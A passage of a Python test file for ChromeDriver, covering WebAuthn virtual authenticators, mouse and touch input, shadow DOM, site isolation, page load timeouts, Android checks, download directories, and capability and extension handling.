    self.assertEquals(True, credentials[0]['isResidentCredential'])
    self.assertEquals('chromedriver.test', credentials[0]['rpId'])
    self.assertEquals(chr(1),
                      self.UrlSafeBase64Decode(credentials[0]['userHandle']))
    # One registration plus one assertion -> sign count of 2.
    self.assertEquals(2, credentials[0]['signCount'])
    self.assertTrue(credentials[0]['privateKey'])
    self.assertEquals('large blob contents',
                      self.UrlSafeBase64Decode(credentials[0]['largeBlob']))

  def testRemoveCredential(self):
    """Verifies RemoveCredential deletes only the targeted credential."""
    script = """
      let done = arguments[0];
      registerCredential().then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
    )
    # Register two credentials.
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    credential1Id = result['credential']['id']
    result = self._driver.ExecuteAsyncScript(script)
    self.assertEquals('OK', result['status'])
    credential2Id = result['credential']['id']
    # GetCredentials should return both credentials.
    credentials = self._driver.GetCredentials(authenticatorId)
    self.assertEquals(2, len(credentials))
    # Removing the first credential should leave only the second one.
    self._driver.RemoveCredential(authenticatorId, credential1Id)
    credentials = self._driver.GetCredentials(authenticatorId)
    self.assertEquals(1, len(credentials))
    self.assertEquals(credential2Id, credentials[0]['credentialId'])

  def testRemoveAllCredentials(self):
    """Verifies RemoveAllCredentials clears every stored credential."""
    register_credential_script = """
      let done = arguments[0];
      registerCredential().then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
    )
    # Register a credential via the webauthn API.
    result = self._driver.ExecuteAsyncScript(register_credential_script)
    self.assertEquals('OK', result['status'])
    credentialId = result['credential']['rawId']
    # Attempting to register with the credential ID on excludeCredentials
    # should fail.
    exclude_credentials_script = """
      let done = arguments[0];
      registerCredential({
        excludeCredentials: [{
          type: "public-key",
          id: Uint8Array.from(%s),
          transports: ["usb"],
        }],
      }).then(done);
    """ % (credentialId)
    result = self._driver.ExecuteAsyncScript(exclude_credentials_script)
    self.assertEquals("InvalidStateError: The user attempted to register an "
                      "authenticator that contains one of the credentials "
                      "already registered with the relying party.",
                      result['status'])
    # The registration should succeed after clearing the credentials.
    self._driver.RemoveAllCredentials(authenticatorId)
    result = self._driver.ExecuteAsyncScript(exclude_credentials_script)
    self.assertEquals('OK', result['status'])

  def testSetUserVerified(self):
    """Verifies SetUserVerified controls whether UV-required registration
    succeeds."""
    register_uv_script = """
      let done = arguments[0];
      registerCredential({
        authenticatorSelection: {
          userVerification: "required",
        },
      }).then(done);
    """
    self._driver.Load(self.GetHttpsUrlForFile(
        '/chromedriver/webauthn_test.html', 'chromedriver.test'))
    authenticatorId = self._driver.AddVirtualAuthenticator(
        protocol = 'ctap2',
        transport = 'usb',
        hasResidentKey = True,
        hasUserVerification = True,
    )
    # Configure the virtual authenticator to fail user verification.
    self._driver.SetUserVerified(authenticatorId, False)
    # Attempting to register a credential with UV required should fail.
    result = self._driver.ExecuteAsyncScript(register_uv_script)
    self.assertTrue(result['status'].startswith("NotAllowedError"),
                    "Expected %s to be a NotAllowedError"
                    % (result['status']))
    # Trying again after setting userVerified to True should succeed.
self._driver.SetUserVerified(authenticatorId, True) result = self._driver.ExecuteAsyncScript(register_uv_script) self.assertEquals("OK", result['status']) # Tests in the following class are expected to be moved to ChromeDriverTest # class when we no longer support the legacy mode. class ChromeDriverW3cTest(ChromeDriverBaseTestWithWebServer): """W3C mode specific tests.""" def setUp(self): self._driver = self.CreateDriver( send_w3c_capability=True, send_w3c_request=True) def testSendKeysToElement(self): self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html')) text = self._driver.ExecuteScript( 'document.body.innerHTML = \'<input type="text">\';' 'var input = document.getElementsByTagName("input")[0];' 'input.addEventListener("change", function() {' ' document.body.appendChild(document.createElement("br"));' '});' 'return input;') text.SendKeys('0123456789+-*/ Hi') text.SendKeys(', there!') value = self._driver.ExecuteScript('return arguments[0].value;', text) self.assertEquals('0123456789+-*/ Hi, there!', value) def testSendKeysToElementDoesNotAppend(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) textControlTypes = ["text", "search", "tel", "url", "password"] for textType in textControlTypes: element = self._driver.ExecuteScript( 'document.body.innerHTML = ' '\'<input type="{}" value="send_this_value">\';' 'var input = document.getElementsByTagName("input")[0];' 'input.focus();' 'input.setSelectionRange(0,0);' 'return input;'.format(textType)) element.SendKeys('hello') value = self._driver.ExecuteScript('return arguments[0].value;', element) self.assertEquals('hellosend_this_value', value) def testSendKeysToEditableElement(self): self._driver.Load(self.GetHttpUrlForFile( '/chromedriver/empty.html')) element = self._driver.ExecuteScript( 'document.body.innerHTML = ' '\'<p contentEditable="true"> <i>hello-></i> ' '<b>send_this_value </b> </p>\';' 'var input = document.getElementsByTagName("i")[0];' 'return input;') 
    element.SendKeys('hello')
    self.assertEquals(u'hello->hello', element.GetText())

    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/empty.html'))
    element = self._driver.ExecuteScript(
        'document.body.innerHTML = '
        '\'<p contentEditable="true"> <i>hello</i> '
        '<b>-></b> </p>\';'
        'var input = document.getElementsByTagName("p")[0];'
        'input.focus();'
        'return input;')
    element.SendKeys('hello')
    self.assertEquals(u'hellohello ->', element.GetText())

  def testUnexpectedAlertOpenExceptionMessage(self):
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript('window.alert("Hi");')
    self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen,
                            '{Alert text : Hi}',
                            self._driver.FindElement, 'tag name', 'divine')
    # In W3C mode, the alert is dismissed by default.
    self.assertFalse(self._driver.IsAlertOpen())


class ChromeDriverTestLegacy(ChromeDriverBaseTestWithWebServer):
  """End to end tests for ChromeDriver in Legacy mode."""

  def setUp(self):
    self._driver = self.CreateDriver(send_w3c_capability=False,
                                     send_w3c_request=False)

  def testContextMenuEventFired(self):
    # A right click (button 2) must fire the page's contextmenu handler.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/context_menu.html'))
    self._driver.MouseMoveTo(self._driver.FindElement('tag name', 'div'))
    self._driver.MouseClick(2)
    self.assertTrue(self._driver.ExecuteScript('return success'))

  def testDragAndDropWithSVGImage(self):
    # Drag the green rectangle onto the folder with low-level mouse commands;
    # the page reacts with an alert and moves the rectangle.
    self._driver.Load(
        self.GetHttpUrlForFile('/chromedriver/drag_and_drop.svg'))
    drag = self._driver.FindElement("css selector", "#GreenRectangle")
    drop = self._driver.FindElement("css selector", "#FolderRectangle")
    self._driver.MouseMoveTo(drag)
    self._driver.MouseButtonDown()
    self._driver.MouseMoveTo(drop)
    self._driver.MouseButtonUp()
    self.assertTrue(self._driver.IsAlertOpen())
    self.assertEquals('GreenRectangle has been dropped into a folder.',
                      self._driver.GetAlertMessage())
    self._driver.HandleAlert(True)
    self.assertEquals('translate(300,55)', drag.GetAttribute("transform"))

  def testMouseButtonDownAndUp(self):
    # mousedown and mouseup handlers must each fire exactly once.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("mousedown", function() {'
        '  var div = document.getElementsByTagName("div")[0];'
        '  div.innerHTML="new1<br>";'
        '});'
        'div.addEventListener("mouseup", function() {'
        '  var div = document.getElementsByTagName("div")[0];'
        '  div.innerHTML="new2<a></a>";'
        '});')
    self._driver.MouseMoveTo(None, 50, 50)
    self._driver.MouseButtonDown()
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))
    self._driver.MouseButtonUp()
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'a')))

  def testMouseClick(self):
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    div = self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("click", function() {'
        '  var div = document.getElementsByTagName("div")[0];'
        '  div.innerHTML="new<br>";'
        '});'
        'return div;')
    self._driver.MouseMoveTo(div)
    self._driver.MouseClick()
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testMouseDoubleClick(self):
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    div = self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("dblclick", function() {'
        '  var div = document.getElementsByTagName("div")[0];'
        '  div.innerHTML="new<br>";'
        '});'
        'return div;')
    self._driver.MouseMoveTo(div, 1, 1)
    self._driver.MouseDoubleClick()
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testMouseMoveTo(self):
    # Moving the pointer over the element must fire its mouseover handler.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    div = self._driver.ExecuteScript(
        'document.body.innerHTML = "<div>old</div>";'
        'var div = document.getElementsByTagName("div")[0];'
        'div.style["width"] = "100px";'
        'div.style["height"] = "100px";'
        'div.addEventListener("mouseover", function() {'
        '  var div = document.getElementsByTagName("div")[0];'
        '  div.innerHTML="new<br>";'
        '});'
        'return div;')
    self._driver.MouseMoveTo(div, 10, 10)
    self.assertEquals(1, len(self._driver.FindElements('tag name', 'br')))

  def testMoveToElementAndClick(self):
    # This page gets rendered differently depending on which platform the test
    # is running on, and what window size is being used. So we need to do some
    # sanity checks to make sure that the <a> element is split across two lines
    # of text.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/multiline.html'))

    # Check that link element spans two lines and that the first ClientRect is
    # above the second.
    link = self._driver.FindElements('tag name', 'a')[0]
    client_rects = self._driver.ExecuteScript(
        'return arguments[0].getClientRects();', link)
    self.assertEquals(2, len(client_rects))
    self.assertTrue(client_rects[0]['bottom'] <= client_rects[1]['top'])

    # Check that the center of the link's bounding ClientRect is outside the
    # element.
    bounding_client_rect = self._driver.ExecuteScript(
        'return arguments[0].getBoundingClientRect();', link)
    center = bounding_client_rect['left'] + bounding_client_rect['width'] / 2
    self.assertTrue(client_rects[1]['right'] < center)
    self.assertTrue(center < client_rects[0]['left'])

    self._driver.MouseMoveTo(link)
    self._driver.MouseClick()
    self.assertTrue(self._driver.GetCurrentUrl().endswith('#top'))

  def _FindElementInShadowDom(self, css_selectors):
    """Find an element inside shadow DOM using CSS selectors.
    The last item in css_selectors identify the element to find. All preceding
    selectors identify the hierarchy of shadow hosts to traverse in order to
    reach the target shadow DOM."""
    current = None
    for selector in css_selectors:
      if current is None:
        # First CSS selector, start from root DOM.
        current = self._driver
      else:
        # current is a shadow host selected previously.
        # Enter the corresponding shadow root.
        current = self._driver.ExecuteScript(
            'return arguments[0].shadowRoot', current)
      current = current.FindElement('css selector', selector)
    return current

  def testShadowDomDisplayed(self):
    """Checks that trying to manipulate shadow DOM elements that are detached
    from the document raises a StaleElementReference exception"""
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/shadow_dom_test.html'))
    elem = self._FindElementInShadowDom(
        ["#innerDiv", "#parentDiv", "#button"])
    self.assertTrue(elem.IsDisplayed())
    elem2 = self._driver.FindElement("css selector", "#hostContent")
    self.assertTrue(elem2.IsDisplayed())
    # Hiding the shadow host's ancestor must make the shadow element report
    # not-displayed as well.
    self._driver.ExecuteScript(
        'document.querySelector("#outerDiv").style.display="None";')
    self.assertFalse(elem.IsDisplayed())

  def testSendingTabKeyMovesToNextInputElement(self):
    # u'\uE004' is the WebDriver key code for Tab.
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/two_inputs.html'))
    first = self._driver.FindElement('css selector', '#first')
    second = self._driver.FindElement('css selector', '#second')
    first.Click()
    self._driver.SendKeys('snoopy')
    self._driver.SendKeys(u'\uE004')
    self._driver.SendKeys('prickly pete')
    self.assertEquals('snoopy', self._driver.ExecuteScript(
        'return arguments[0].value;', first))
    self.assertEquals('prickly pete', self._driver.ExecuteScript(
        'return arguments[0].value;', second))

  def testMobileEmulationDisabledByDefault(self):
    self.assertFalse(self._driver.capabilities['mobileEmulationEnabled'])

  def testSendKeysToElement(self):
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    text = self._driver.ExecuteScript(
        'document.body.innerHTML = \'<input type="text">\';'
        'var input = document.getElementsByTagName("input")[0];'
        'input.addEventListener("change", function() {'
        '  document.body.appendChild(document.createElement("br"));'
        '});'
        'return input;')
    text.SendKeys('0123456789+-*/ Hi')
    text.SendKeys(', there!')
    value = self._driver.ExecuteScript('return arguments[0].value;', text)
    self.assertEquals('0123456789+-*/ Hi, there!', value)

  def testUnexpectedAlertOpenExceptionMessage(self):
    # Unlike W3C mode, legacy mode prefixes the message with
    # "unexpected alert open: ".
    self._driver.Load(self.GetHttpUrlForFile('/chromedriver/empty.html'))
    self._driver.ExecuteScript('window.alert("Hi");')
    self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen,
                            'unexpected alert open: {Alert text : Hi}',
                            self._driver.FindElement, 'tag name', 'divine')

  def testTouchScrollElement(self):
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/touch_action_tests.html'))
    scroll_left = 'return document.documentElement.scrollLeft;'
    scroll_top = 'return document.documentElement.scrollTop;'
    self.assertEquals(0, self._driver.ExecuteScript(scroll_left))
    self.assertEquals(0, self._driver.ExecuteScript(scroll_top))
    target = self._driver.FindElement('css selector', '#target')
    self._driver.TouchScroll(target, 47, 53)
    # https://bugs.chromium.org/p/chromedriver/issues/detail?id=1179
    self.assertAlmostEqual(47, self._driver.ExecuteScript(scroll_left),
                           delta=1)
    self.assertAlmostEqual(53, self._driver.ExecuteScript(scroll_top),
                           delta=1)

  def testTouchDoubleTapElement(self):
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/touch_action_tests.html'))
    target = self._driver.FindElement('css selector', '#target')
    target.DoubleTap()
    events = self._driver.FindElement('css selector', '#events')
    self.assertEquals('events: touchstart touchend touchstart touchend',
                      events.GetText())

  def testTouchLongPressElement(self):
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/touch_action_tests.html'))
    target = self._driver.FindElement('css selector', '#target')
    target.LongPress()
    events = self._driver.FindElement('css selector', '#events')
    self.assertEquals('events: touchstart touchcancel', events.GetText())

  def testTouchSingleTapElement(self):
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/touch_action_tests.html'))
    target = self._driver.FindElement('css selector', '#target')
    target.SingleTap()
    events = self._driver.FindElement('css selector', '#events')
    self.assertEquals('events: touchstart touchend', events.GetText())


class ChromeDriverSiteIsolation(ChromeDriverBaseTestWithWebServer):
  """Tests for ChromeDriver with the new Site Isolation Chrome feature.

  This feature can be turned on using the --site-per-process flag.

  In order to trick the test into thinking that we are on two separate
  origins, the cross_domain_iframe.html code points to localhost instead of
  127.0.0.1.

  Note that Chrome does not allow "localhost" to be passed to
  --isolate-origins for fixable technical reasons related to subdomain
  matching.
  """

  def setUp(self):
    self._driver = self.CreateDriver(chrome_switches=['--site-per-process'])

  def testCanClickOOPIF(self):
    """Test that you can click into an Out of Process I-Frame (OOPIF).

    Note that the Iframe will not be out-of-process if the correct flags are
    not passed into Chrome.
    """
    if util.GetPlatformName() == 'win':
      # https://bugs.chromium.org/p/chromedriver/issues/detail?id=2198
      # This test is unreliable on Windows, as FindElement can be called too
      # soon, before the child frame is fully loaded. This causes element not
      # found error. Add an implicit wait works around this issue.
      self._driver.SetTimeouts({'implicit': 2000})
    self._driver.Load(self.GetHttpUrlForFile(
        '/chromedriver/cross_domain_iframe.html'))
    frame = self._driver.FindElement('tag name', 'iframe')
    self._driver.SwitchToFrame(frame)
    # Wait for the cross-origin child frame to finish loading before
    # interacting with it.
    self.assertTrue(self.WaitForCondition(
        lambda: 'outer.html' in
            self._driver.ExecuteScript('return window.location.href')))
    self.assertTrue(self.WaitForCondition(
        lambda: 'complete' ==
            self._driver.ExecuteScript('return document.readyState')))
    self._driver.SwitchToMainFrame()
    a_outer = self._driver.FindElement('tag name', 'a')
    a_outer.Click()
    frame_url = self._driver.ExecuteScript('return window.location.href')
    self.assertTrue(frame_url.endswith('#one'))
    # Now click the link inside the OOPIF and verify its URL fragment changes.
    self._driver.SwitchToFrame(frame)
    a_inner = self._driver.FindElement('tag name', 'a')
    a_inner.Click()
    frame_url = self._driver.ExecuteScript('return window.location.href')
    self.assertTrue(frame_url.endswith('#two'))


class ChromeDriverPageLoadTimeoutTest(ChromeDriverBaseTestWithWebServer):

  class _RequestHandler(object):
    """HTTP handler that blocks each response until told to proceed, used to
    simulate a hanging navigation."""

    def __init__(self):
      self.request_received_event = threading.Event()
      self.send_response_event = threading.Event()

    def handle(self, request):
      self.request_received_event.set()
      # Don't hang infinitely, 10 seconds are enough.
      self.send_response_event.wait(10)
      self.send_response_event.clear()
      return {'Cache-Control': 'no-store'}, 'Hi!'

  def setUp(self):
    self._handler = ChromeDriverPageLoadTimeoutTest._RequestHandler()
    self._http_server.SetCallbackForPath('/hang', self._handler.handle)
    super(ChromeDriverPageLoadTimeoutTest, self).setUp()
    # Map every hostname to the local server so cross-domain URLs resolve.
    self._driver = self.CreateDriver(
        chrome_switches=['host-resolver-rules=MAP * 127.0.0.1'])
    self._initial_url = self.GetHttpUrlForFile('/chromedriver/empty.html')
    self._driver.Load(self._initial_url)
    # When send_response_event is set, navigating to the hang URL takes only
    # about 0.1 second on Linux and Windows, but takes half a second or longer
    # on Mac. So we use longer timeout on Mac, 0.5 second on others.
    timeout = 3000 if util.GetPlatformName() == 'mac' else 500
    self._driver.SetTimeouts({'pageLoad': timeout})

  def tearDown(self):
    super(ChromeDriverPageLoadTimeoutTest, self).tearDown()
    self._http_server.SetCallbackForPath('/hang', None)

  def _LoadHangingUrl(self, host=None):
    self._driver.Load(self._http_server.GetUrl(host) + '/hang')

  def _CheckPageLoadTimeout(self, action):
    """Runs action() and asserts it times out while the server is hanging."""
    self._handler.request_received_event.clear()
    timed_out = False
    try:
      action()
    except chromedriver.ChromeDriverException as e:
      self.assertNotEqual(-1, e.message.find('timeout'))
      timed_out = True
    finally:
      # Unblock the server so it does not hold the request for 10 seconds.
      self._handler.send_response_event.set()

    self.assertTrue(timed_out)
    # Verify that the browser actually made that request.
    self.assertTrue(self._handler.request_received_event.wait(1))

  def testPageLoadTimeout(self):
    self._CheckPageLoadTimeout(self._LoadHangingUrl)
    self.assertEquals(self._initial_url, self._driver.GetCurrentUrl())

  def testPageLoadTimeoutCrossDomain(self):
    # Cross-domain navigation is likely to be a cross-process one. In this
    # case DevToolsAgentHost behaves quite differently and does not send
    # command responses if the navigation hangs, so this case deserves a
    # dedicated test.
    self._CheckPageLoadTimeout(lambda: self._LoadHangingUrl('foo.bar'))
    self.assertEquals(self._initial_url, self._driver.GetCurrentUrl())

  def testHistoryNavigationWithPageLoadTimeout(self):
    # Allow the page to load for the first time.
    self._handler.send_response_event.set()
    self._LoadHangingUrl()
    self.assertTrue(self._handler.request_received_event.wait(1))

    self._driver.GoBack()
    self._CheckPageLoadTimeout(self._driver.GoForward)
    self.assertEquals(self._initial_url, self._driver.GetCurrentUrl())

  def testRefreshWithPageLoadTimeout(self):
    # Allow the page to load for the first time.
    self._handler.send_response_event.set()
    self._LoadHangingUrl()
    self.assertTrue(self._handler.request_received_event.wait(1))

    # Refreshing while the server hangs must hit the page load timeout.
    self._CheckPageLoadTimeout(self._driver.Refresh)


class ChromeDriverAndroidTest(ChromeDriverBaseTest):
  """End to end tests for Android-specific tests."""

  def testLatestAndroidAppInstalled(self):
    # Only meaningful for the stable/beta Android packages.
    if ('stable' not in _ANDROID_PACKAGE_KEY and
        'beta' not in _ANDROID_PACKAGE_KEY):
      return

    self._driver = self.CreateDriver()

    try:
      omaha_list = json.loads(
          urllib2.urlopen('http://omahaproxy.appspot.com/all.json').read())
      for l in omaha_list:
        if l['os'] != 'android':
          continue
        for v in l['versions']:
          if (('stable' in v['channel'] and 'stable' in _ANDROID_PACKAGE_KEY)
              or ('beta' in v['channel'] and 'beta' in _ANDROID_PACKAGE_KEY)):
            # Compare dotted version strings component-wise as int lists.
            omaha = map(int, v['version'].split('.'))
            device = map(
                int, self._driver.capabilities['browserVersion'].split('.'))
            self.assertTrue(omaha <= device)
            return
      raise RuntimeError('Malformed omaha JSON')
    except urllib2.URLError as e:
      # Best effort: skip the check if omahaproxy is unreachable.
      print 'Unable to fetch current version info from omahaproxy (%s)' % e

  def testDeviceManagement(self):
    # One driver per healthy device; one more must fail, and quitting a
    # driver frees its device for reuse.
    self._drivers = [
        self.CreateDriver() for _ in device_utils.DeviceUtils.HealthyDevices()]
    self.assertRaises(chromedriver.UnknownError, self.CreateDriver)
    self._drivers[0].Quit()
    self._drivers[0] = self.CreateDriver()

  def testAndroidGetWindowSize(self):
    self._driver = self.CreateDriver()
    size = self._driver.GetWindowRect()
    script_size = self._driver.ExecuteScript(
        'return [window.outerWidth, window.outerHeight, 0, 0]')
    self.assertEquals(size, script_size)
    script_inner = self._driver.ExecuteScript(
        'return [window.innerWidth * visualViewport.scale, '
        'window.innerHeight * visualViewport.scale]')
    # Subtract inner size by 1 to compensate for rounding errors.
self.assertLessEqual(script_inner[0] - 1, size[0]) self.assertLessEqual(script_inner[1] - 1, size[1]) # Sanity check: screen dimensions in the range 20-20000px self.assertLessEqual(size[0], 20000) self.assertLessEqual(size[1], 20000) self.assertGreaterEqual(size[0], 20) self.assertGreaterEqual(size[1], 20) class ChromeDownloadDirTest(ChromeDriverBaseTest): def __init__(self, *args, **kwargs): super(ChromeDownloadDirTest, self).__init__(*args, **kwargs) self._temp_dirs = [] def CreateTempDir(self): temp_dir = tempfile.mkdtemp() self._temp_dirs.append(temp_dir) return temp_dir def RespondWithCsvFile(self, request): return {'Content-Type': 'text/csv'}, 'a,b,c\n1,2,3\n' def WaitForFileToDownload(self, path): deadline = monotonic() + 60 while True: time.sleep(0.1) if os.path.isfile(path) or monotonic() > deadline: break self.assertTrue(os.path.isfile(path), "Failed to download file!") def tearDown(self): # Call the superclass tearDown() method before deleting temp dirs, so that # Chrome has a chance to exit before its user data dir is blown away from # underneath it. super(ChromeDownloadDirTest, self).tearDown() for temp_dir in self._temp_dirs: # Deleting temp dir can fail if Chrome hasn't yet fully exited and still # has open files in there. So we ignore errors, and retry if necessary. 
shutil.rmtree(temp_dir, ignore_errors=True) retry = 0 while retry < 10 and os.path.exists(temp_dir): time.sleep(0.1) shutil.rmtree(temp_dir, ignore_errors=True) def testFileDownloadWithClick(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadWithClickHeadless(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadAfterTabHeadless(self): download_dir = self.CreateTempDir() download_name = os.path.join(download_dir, 'a_red_dot.png') driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/empty.html')) new_window = driver.NewWindow(window_type='tab') driver.SwitchToWindow(new_window['handle']) driver.Load(ChromeDriverTest.GetHttpUrlForFile( '/chromedriver/download.html')) driver.FindElement('css selector', '#red-dot').Click() self.WaitForFileToDownload(download_name) self.assertEqual( ChromeDriverTest.GetHttpUrlForFile('/chromedriver/download.html'), driver.GetCurrentUrl()) def testFileDownloadWithGet(self): ChromeDriverTest._http_server.SetCallbackForPath( '/abc.csv', self.RespondWithCsvFile) download_dir = self.CreateTempDir() driver = 
self.CreateDriver(download_dir=download_dir) original_url = driver.GetCurrentUrl() driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv')) self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv')) self.assertEqual(original_url, driver.GetCurrentUrl()) def testFileDownloadWithGetHeadless(self): ChromeDriverTest._http_server.SetCallbackForPath( '/abc.csv', self.RespondWithCsvFile) download_dir = self.CreateTempDir() driver = self.CreateDriver(download_dir=download_dir, chrome_switches=['--headless']) original_url = driver.GetCurrentUrl() driver.Load(ChromeDriverTest.GetHttpUrlForFile('/abc.csv')) self.WaitForFileToDownload(os.path.join(download_dir, 'abc.csv')) self.assertEqual(original_url, driver.GetCurrentUrl()) def testDownloadDirectoryOverridesExistingPreferences(self): user_data_dir = self.CreateTempDir() download_dir = self.CreateTempDir() sub_dir = os.path.join(user_data_dir, 'Default') os.mkdir(sub_dir) prefs_file_path = os.path.join(sub_dir, 'Preferences') prefs = { 'test': 'this should not be changed', 'download': { 'default_directory': '/old/download/directory' } } with open(prefs_file_path, 'w') as f: json.dump(prefs, f) driver = self.CreateDriver( chrome_switches=['user-data-dir=' + user_data_dir], download_dir=download_dir) with open(prefs_file_path) as f: prefs = json.load(f) self.assertEqual('this should not be changed', prefs['test']) download = prefs['download'] self.assertEqual(download['default_directory'], download_dir) class ChromeSwitchesCapabilityTest(ChromeDriverBaseTest): """Tests that chromedriver properly processes chromeOptions.args capabilities. Makes sure the switches are passed to Chrome. """ def testSwitchWithoutArgument(self): """Tests that switch --dom-automation can be passed to Chrome. Unless --dom-automation is specified, window.domAutomationController is undefined. 
""" driver = self.CreateDriver(chrome_switches=['dom-automation']) self.assertNotEqual( None, driver.ExecuteScript('return window.domAutomationController')) def testRemoteDebuggingPort(self): """Tests that passing --remote-debugging-port through capabilities works. """ # Must use retries since there is an inherent race condition in port # selection. ports_generator = util.FindProbableFreePorts() for _ in range(3): port = ports_generator.next() port_flag = 'remote-debugging-port=%s' % port try: driver = self.CreateDriver(chrome_switches=[port_flag]) except: continue driver.Load('chrome:version') command_line = driver.FindElement('css selector', '#command_line').GetText() self.assertIn(port_flag, command_line) break else: # Else clause gets invoked if "break" never happens. raise # This re-raises the most recent exception. class ChromeDesiredCapabilityTest(ChromeDriverBaseTest): """Tests that chromedriver properly processes desired capabilities.""" def testDefaultTimeouts(self): driver = self.CreateDriver() timeouts = driver.GetTimeouts() # Compare against defaults in W3C spec self.assertEquals(timeouts['implicit'], 0) self.assertEquals(timeouts['pageLoad'], 300000) self.assertEquals(timeouts['script'], 30000) def testTimeouts(self): driver = self.CreateDriver(timeouts = { 'implicit': 123, 'pageLoad': 456, 'script': 789 }) timeouts = driver.GetTimeouts() self.assertEquals(timeouts['implicit'], 123) self.assertEquals(timeouts['pageLoad'], 456) self.assertEquals(timeouts['script'], 789) # Run in Legacy mode def testUnexpectedAlertBehaviourLegacy(self): driver = self.CreateDriver(unexpected_alert_behaviour="accept", send_w3c_capability=False, send_w3c_request=False) self.assertEquals("accept", driver.capabilities['unexpectedAlertBehaviour']) driver.ExecuteScript('alert("HI");') self.WaitForCondition(driver.IsAlertOpen) self.assertRaisesRegexp(chromedriver.UnexpectedAlertOpen, 'unexpected alert open: {Alert text : HI}', driver.FindElement, 'tag name', 'div') 
    # The accept behaviour dismissed the alert when FindElement ran above.
    self.assertFalse(driver.IsAlertOpen())

  def testUnexpectedAlertBehaviourW3c(self):
    driver = self.CreateDriver(unexpected_alert_behaviour='accept',
                               send_w3c_capability=True,
                               send_w3c_request=True)
    self.assertEquals('accept',
                      driver.capabilities['unhandledPromptBehavior'])
    driver.ExecuteScript('alert("HI");')
    self.WaitForCondition(driver.IsAlertOpen)
    # With unhandledPromptBehavior=accept, calling GetTitle (and most other
    # endpoints) automatically dismisses the alert, so IsAlertOpen() becomes
    # False afterwards.
    self.assertEquals(driver.GetTitle(), '')
    self.assertFalse(driver.IsAlertOpen())


class ChromeExtensionsCapabilityTest(ChromeDriverBaseTestWithWebServer):
  """Tests that chromedriver properly processes chromeOptions.extensions."""

  def _PackExtension(self, ext_path):
    # Extensions are passed over the wire as base64-encoded package bytes.
    return base64.b64encode(open(ext_path, 'rb').read())

  def testExtensionsInstall(self):
    """Checks that chromedriver can take the extensions in crx format."""
    crx_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.crx')
    crx_2 = os.path.join(_TEST_DATA_DIR, 'ext_test_2.crx')
    self.CreateDriver(chrome_extensions=[self._PackExtension(crx_1),
                                         self._PackExtension(crx_2)])

  def testExtensionsInstallZip(self):
    """Checks that chromedriver can take the extensions in zip format."""
    zip_1 = os.path.join(_TEST_DATA_DIR, 'ext_test_1.zip')
    self.CreateDriver(chrome_extensions=[self._PackExtension(zip_1)])

  def testCanInspectBackgroundPage(self):
    # windowTypes must include 'background_page' for the extension's
    # generated background page to show up as a window handle.
    crx = os.path.join(_TEST_DATA_DIR, 'ext_bg_page.crx')
    driver = self.CreateDriver(
        chrome_extensions=[self._PackExtension(crx)],
        experimental_options={'windowTypes': ['background_page']})
    handles = driver.GetWindowHandles()
    for handle in handles:
      driver.SwitchToWindow(handle)
